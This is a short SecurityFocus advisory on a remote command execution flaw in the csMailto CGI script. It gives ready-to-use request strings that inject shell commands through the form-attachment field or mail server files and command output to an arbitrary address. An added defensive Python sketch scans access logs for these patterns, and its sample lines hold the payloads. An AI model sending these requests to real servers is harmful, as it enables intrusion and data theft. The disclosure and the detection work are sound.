
CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability

Multiple exploits are provided by Steve Gustin <stegus1@yahoo.com>, including:

- execute commands on server

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform

- execute command on server and mail output to anyone

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform

- email server file to anyone

CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform
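A detection sketch for the request patterns listed above, added here as an example and not part of the original advisory: it scans web access logs for csMailto.cgi requests that carry the form-attachment field in the query string. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return 'command', 'file' or None for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # The advisory spells the script both csMailto and CSMailto.
    if not url.path.lower().endswith("/csmailto.cgi"):
        return None
    # parse_qs percent-decodes values, so %7C is seen as '|'.
    values = parse_qs(url.query, keep_blank_values=True).get("form-attachment")
    if not values:
        return None
    if any("|" in v for v in values):
        return "command"   # pipe in the value: the command-execution pattern
    if any(v.strip() for v in values):
        return "file"      # plain path: the mail-a-server-file pattern
    return None

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2002:10:00:00 +0000] "GET /cgi-bin/CSMailto.cgi'
    '?form-attachment=id%7C&command=mailform HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/2002:10:00:05 +0000] "GET /cgi-bin/csMailto.cgi'
    '?form-attachment=/etc/hosts&Email=user@host.com&form-autoresponse=YES'
    '&command=mailform HTTP/1.0" 200 300',
    '192.0.2.12 - - [01/Jan/2002:10:00:09 +0000] "POST /cgi-bin/csMailto.cgi HTTP/1.0" 200 800',
    '192.0.2.13 - - [01/Jan/2002:10:00:12 +0000] "GET /index.html?form-attachment=x%7C HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: form-attachment in query string ({verdict} pattern)")
```

This only sees values sent in the query string; the same field submitted in a POST body does not appear in a standard access log and needs request-body inspection to catch.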







 

Copyright 2008, SecurityFocus